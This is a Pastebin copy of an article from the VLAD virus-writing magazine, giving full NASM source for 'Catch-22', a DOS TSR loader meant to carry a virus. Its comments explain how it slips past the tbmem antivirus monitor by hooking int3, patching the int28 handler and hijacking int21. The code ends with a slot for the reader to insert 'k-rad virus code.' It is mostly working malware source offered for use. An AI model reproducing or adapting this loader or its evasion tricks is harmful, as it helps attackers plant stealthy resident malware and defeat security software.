Advertisement
FlyFar

VLAD Magazine - Issue #3 - ARTICLE.5_3 - Catch-22 TSR Loader Source Code

Jun 28th, 2023
1,264
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 4.67 KB | Cybersecurity | 0 0
  1. ; Catch-22, a TSR loader by Rhincewind [Vlad]
  2. ;
  3. ; This is probably the most experimental thing I've done so far. In this
  4. ; loader I've combined a few things I learned about tbmem into a pretty
  5. ; neat loader that the current version of tbmem will not detect.
  6. ;
  7. ; The highloader is pretty straightforward, although it does use one
  8. ; trick I found. It traces the PSP chain all the way back to the command
  9. ; interpreter, then makes that PSP active before a block is allocated for
  10. ; the loader. This so-called 'context switching' will make the newly
  11. ; allocated block property of your command interpreter, ensuring it's
  12. ; lasting residency. Down with direct MCB twiddling!
  13. ;
  14. ; Now tbmem comes into play. First, two facts:
  15. ;
  16. ; Fact 1 - Tbmem detects residency on vectorchanges only. It can't be
  17. ;          bothered to look at the memory itself.
  18. ; Fact 2 - Tbmem does not flag on intel reserved registers being hooked.
  19. ;
  20. ; For starters the loader will hook int3, thereby not alerting tbmem as
  21. ; above. The first byte of the int28 handler, which is an IRET in the
  22. ; original handler, will be overwritten
  23. ; with an int3. Now, as you probably know, only the command
  24. ; interpreter calls int28 (Okay, so do Terminate and a handful of other
  25. ; programs, watch out for those) which is redirected to our routine.
  26. ; We managed to get a routine active around tbmem! Hurray! Now, the int3
  27. ; handler will countdown 75 times, 13 is the minimum btw, to make sure
  28. ; that we're back in command mode, that is, out of the dos deallocation
  29. ; routines before we hook int21, which again, will elude tbmem. Both int28
  30. ; and int3 are restored and we're done with our loader.
  31.  
  32.                 .model tiny
  33.                 .code
  34.                 org 100h
  35. parasize        equ (endloader-start)
  36. start:
  37.                 mov ax, 'TB'
  38.                 int 21h
  39.                 cmp ax, 'AV'
  40.                 jz exit_tsr
  41.                 mov ah, 4ah
  42.                 mov bx,-1
  43.                 push ax
  44.                 int 21h
  45.                 pop ax
  46.                 sub bx, parasize+2
  47.                 int 21h
  48.                 xor si,si
  49. nextpsp:
  50.                 cmp bx, word ptr ds:[si+16h]
  51.                 mov bx, word ptr ds:[si+16h]
  52.                 mov ds,bx
  53.                 jnz nextpsp
  54. found_cmd:
  55.                 mov ah, 50h
  56.                 int 21h
  57.                 mov ah, 48h
  58.                 mov bx,parasize+1
  59.                 int 21h
  60.                 mov es,ax
  61.                 mov ah, 50h
  62.                 mov bx,cs
  63.                 int 21h
  64.                 push cs
  65.                 pop ds
  66.                 mov si, 100h
  67.                 xor di,di
  68.                 mov cx, endloader-start
  69.                 rep movsb
  70.                 mov ds,cx
  71.                 mov si, 3*4
  72.                 movsw
  73.                 movsw
  74.                 cli
  75.                 mov word ptr [si-4],offset install_21-100h
  76.                 mov word ptr [si-2],es
  77.                 sti
  78.                 mov si, 28h*4
  79.                 movsw
  80.                 movsw
  81.                 mov ax,75h
  82.                 stosw
  83.                 mov word ptr es:[di],75h
  84.                 lds bx, dword ptr ds:[si-4]
  85.                 mov al, 0cch
  86.                 xchg byte ptr ds:[bx],al
  87.                 stosb
  88.                 ;Restore all registers here, including DS&ES
  89. exit_tsr:                
  90.                 int 20h
  91. install_21:    
  92.                 dec word ptr cs:counter-100h
  93.                 jnz exit_int3
  94.                 push ax
  95.                 push di
  96.                 push ds
  97.                 push es
  98.                 xor ax,ax
  99.                 mov ds,ax
  100.                 les di, dword ptr cs:int2offset-100h
  101.                 mov al, byte ptr cs:orgbyte-100h
  102.                 stosb
  103.                 cli
  104.                 les di, dword ptr cs:intoffset-100h
  105.                 mov word ptr ds:[0ch],di
  106.                 mov word ptr ds:[0eh],es
  107.                 mov ax,offset int21-100h
  108.                 xchg ax, word ptr ds:[84h]
  109.                 mov cs:intoffset-100h,ax
  110.                 mov ax,cs
  111.                 xchg ax, word ptr ds:[86h]
  112.                 mov cs:intseg-100h,ax
  113.                 sti
  114.                 pop es
  115.                 pop ds
  116.                 pop di
  117.                 pop ax
  118. exit_int3:                
  119.                 add sp,6
  120.                 iret
  121. ;Replace the handler below with your k-rad virus code.
  122. int21:
  123.                 cmp ax,'TB'
  124.                 jnz return_int
  125.                 mov ax, 'AV'
  126.                 iret
  127. return_int:                
  128.                 jmp dword ptr cs:intoffset-100h
  129. endloader:
  130. intoffset      dw ?
  131. intseg         dw ?
  132. int2offset     dw ?
  133. int2seg        dw ?
  134. counter        dw ?
  135. orgbyte        db ?
  136.  
  137.                 end start
Tags: loader vlad TSR
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement